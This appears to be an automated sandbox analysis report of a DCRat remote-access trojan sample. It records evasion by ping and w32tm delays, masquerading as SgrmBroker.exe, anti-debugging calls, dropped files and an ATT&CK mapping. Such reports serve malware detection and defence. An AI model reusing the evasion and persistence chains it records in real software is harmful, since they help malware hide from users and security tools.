                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Uses ping.exe to sleep
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeMemory allocated: 1AF70000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeMemory allocated: 21A0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeMemory allocated: 1A3A0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeMemory allocated: 15B0000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeMemory allocated: 1B1B0000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeMemory allocated: D80000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeMemory allocated: 1A760000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeMemory allocated: FC0000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeMemory allocated: 1AD00000 memory reserve | memory write watch
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\wYGfctxY.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\kzbsFheO.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\vmGXvtnF.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\zVMHRGyj.logJump to dropped file
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\plugneHL.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\RpedHXOW.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\BUHwkZnR.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\FPzqkKvM.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\DYEovgjB.logJump to dropped file
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\AchrHOgY.logJump to dropped file
                                  Source: C:\Users\user\Desktop\onlysteal.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23748
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe TID: 1280Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe TID: 1472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe TID: 4044Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe TID: 5128Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe TID: 6232Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe TID: 3260Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0023A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0023A69B
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0024C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0024C220
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0025B348 FindFirstFileExA,0_2_0025B348
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0024E6A3 VirtualQuery,GetSystemInfo,0_2_0024E6A3
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: wscript.exe, 00000002.00000003.2144379874.000000000320E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: SgrmBroker.exe, 0000000B.00000002.2484973614.000000001ACE2000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000010.00000002.2532034850.0000023A56BC9000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000011.00000002.2758435074.0000000001425000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000016.00000002.3079584451.000000001DC29000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000001A.00000002.3123438764.000001957CC70000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 0000001B.00000002.3343374036.000000000105A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\Desktop\onlysteal.exeAPI call chain: ExitProcess graph end nodegraph_0-23939
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0024F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0024F838
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_00257DEE mov eax, dword ptr fs:[00000030h]0_2_00257DEE
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0025C030 GetProcessHeap,0_2_0025C030
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess token adjusted: Debug
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess token adjusted: Debug
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0024F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0024F838
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0024F9D5 SetUnhandledExceptionFilter,0_2_0024F9D5
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0024FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0024FBCA
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_00258EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00258EBD
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeMemory allocated: page read and write | page guardJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Intorefnet\Te60v9QbFjSF8KEQUR.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intorefnet\hyperBlockCrtCommon.exe "C:\Intorefnet/hyperBlockCrtCommon.exe"Jump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" Jump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" Jump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0024F654 cpuid 0_2_0024F654
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0024AF0F
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeQueries volume information: C:\Intorefnet\hyperBlockCrtCommon.exe VolumeInformationJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe VolumeInformationJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0024DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0024DF1E
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0023B146 GetVersionExW,0_2_0023B146
                                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Stealing of Sensitive Information

                                  barindex
                                  Yara detected DCRat
                                  Source: Yara matchFile source: onlysteal.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.onlysteal.exe.609c6de.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.hyperBlockCrtCommon.exe.c80000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.onlysteal.exe.699b6de.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000000.2145486370.0000000000C82000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.2090139525.0000000006946000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.2089878775.000000000694D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: onlysteal.exe PID: 716, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: hyperBlockCrtCommon.exe PID: 2016, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Intorefnet\hyperBlockCrtCommon.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\smss.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, type: DROPPED

                                  Remote Access Functionality

                                  barindex
                                  Yara detected DCRat
                                  Source: Yara matchFile source: onlysteal.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.onlysteal.exe.609c6de.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.hyperBlockCrtCommon.exe.c80000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.onlysteal.exe.699b6de.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000000.2145486370.0000000000C82000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.2090139525.0000000006946000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.2089878775.000000000694D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: onlysteal.exe PID: 716, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: hyperBlockCrtCommon.exe PID: 2016, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Intorefnet\hyperBlockCrtCommon.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\smss.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, type: DROPPED

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information11
                                  Scripting                                  		Valid Accounts2
                                  Command and Scripting Interpreter                                  		11
                                  Scripting                                  		11
                                  Process Injection                                  		212
                                  Masquerading                                  		OS Credential Dumping1
                                  System Time Discovery                                  		Remote Services11
                                  Archive Collected Data                                  		1
                                  Encrypted Channel                                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts1
                                  Native API                                  		1
                                  Registry Run Keys / Startup Folder                                  		1
                                  Registry Run Keys / Startup Folder                                  		1
                                  Disable or Modify Tools                                  		LSASS Memory121
                                  Security Software Discovery                                  		Remote Desktop ProtocolData from Removable Media1
                                  Non-Application Layer Protocol                                  		Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain AccountsAt1
                                  DLL Side-Loading                                  		1
                                  DLL Side-Loading                                  		31
                                  Virtualization/Sandbox Evasion                                  		Security Account Manager1
                                  Process Discovery                                  		SMB/Windows Admin SharesData from Network Shared Drive11
                                  Application Layer Protocol                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                                  Process Injection                                  		NTDS31
                                  Virtualization/Sandbox Evasion                                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                                  Deobfuscate/Decode Files or Information                                  		LSA Secrets1
                                  Remote System Discovery                                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                                  Obfuscated Files or Information                                  		Cached Domain Credentials1
                                  System Network Configuration Discovery                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                                  Software Packing                                  		DCSync3
                                  File and Directory Discovery                                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                  DLL Side-Loading                                  		Proc Filesystem36
                                  System Information Discovery                                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
